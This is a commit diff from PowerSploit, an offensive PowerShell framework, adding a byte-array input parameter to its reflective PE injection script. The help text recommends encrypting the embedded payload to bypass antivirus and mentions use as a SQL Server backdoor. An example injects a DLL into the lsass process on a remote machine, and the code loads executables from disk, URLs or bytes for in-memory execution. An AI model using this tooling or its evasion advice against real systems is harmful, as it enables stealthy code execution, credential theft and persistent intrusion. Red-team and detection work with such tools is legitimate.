diff options
| author | Matt Graeber <mattgraeber@gmail.com> | 2015-01-26 12:30:28 -0500 |
|---|---|---|
| committer | Matt Graeber <mattgraeber@gmail.com> | 2015-01-26 12:30:28 -0500 |
| commit | a574705ce2dfe93ee7450840b0ba1a6424dbf5ad (patch) | |
| tree | 692405908b01d460f23fe26192f47792d5bd3133 | |
| parent | b0cdb2b754454b18dc89c772ce0d315beab7400b (diff) | |
| parent | 93bc214659966bbbc77e85e08a44988044164735 (diff) | |
| download | PowerSploit-a574705ce2dfe93ee7450840b0ba1a6424dbf5ad.tar.gz PowerSploit-a574705ce2dfe93ee7450840b0ba1a6424dbf5ad.zip | |
Merge pull request #61 from clymb3r/master
Adding PEBytes parameter
| -rw-r--r-- | CodeExecution/Invoke-ReflectivePEInjection.ps1 | 22 |
1 files changed, 17 insertions, 5 deletions
diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1 index f149ed2..4ca1b9d 100644 --- a/CodeExecution/Invoke-ReflectivePEInjection.ps1 +++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1 @@ -23,7 +23,7 @@ from the DLL. The script doesn't wait for the DLL to complete execution, and doe remote process. -While this script provides functionality to specify a file to load from disk or from a URL, these are more for demo purposes. The way I'd recommend using the script is to create a byte array +While this script provides functionality to specify a file to load from disk a URL, or a byte array, these are more for demo purposes. The way I'd recommend using the script is to create a byte array containing the file you'd like to reflectively load, and hardcode that byte array in to the script. One advantage of doing this is you can encrypt the byte array and decrypt it in memory, which will bypass A/V. Another advantage is you won't be making web requests. The script can also load files from SQL Server and be used as a SQL Server backdoor. Please see the Casaba blog linked below (thanks to whitey). @@ -33,7 +33,7 @@ Author: Joe Bialek, Twitter: @JosephBialek License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None -Version: 1.3 +Version: 1.4 .DESCRIPTION @@ -47,6 +47,10 @@ The path of the DLL/EXE to load and execute. This file must exist on the compute A URL containing a DLL/EXE to load and execute. +.PARAMETER PEBytes + +A byte array containing a DLL/EXE to load and execute. + .PARAMETER ComputerName Optional, an array of computernames to run the script on. @@ -107,6 +111,11 @@ Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4" Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer. Invoke-ReflectivePEInjection -PEPath DemoDLL_RemoteProcess.dll -ProcName lsass -ComputerName Target.Local +.EXAMPLE + +Load a PE from a byte array. +Invoke-ReflectivePEInjection -PEPath (Get-Content c:\DemoEXE.exe -Encoding Byte) -ExeArgs "Arg1 Arg2 Arg3 Arg4" + .NOTES GENERAL NOTES: The script has 3 basic sets of functionality: @@ -182,6 +191,11 @@ Param( [Parameter(ParameterSetName = "WebFile", Position = 0, Mandatory = $true)] [Uri] $PEUrl, + + [Parameter(ParameterSetName = "Bytes", Position = 0, Mandatory = $true)] + [ValidateNotNullOrEmpty()] + [Byte[]] + $PEBytes, [Parameter(Position = 1)] [String[]] @@ -2886,14 +2900,12 @@ Function Main Write-Verbose "PowerShell ProcessID: $PID" - [Byte[]]$PEBytes = $null - if ($PsCmdlet.ParameterSetName -ieq "LocalFile") { Get-ChildItem $PEPath -ErrorAction Stop | Out-Null [Byte[]]$PEBytes = [System.IO.File]::ReadAllBytes((Resolve-Path $PEPath)) } - else + elseif ($PsCmdlet.ParameterSetName -ieq "WebFile") { $WebClient = New-Object System.Net.WebClient |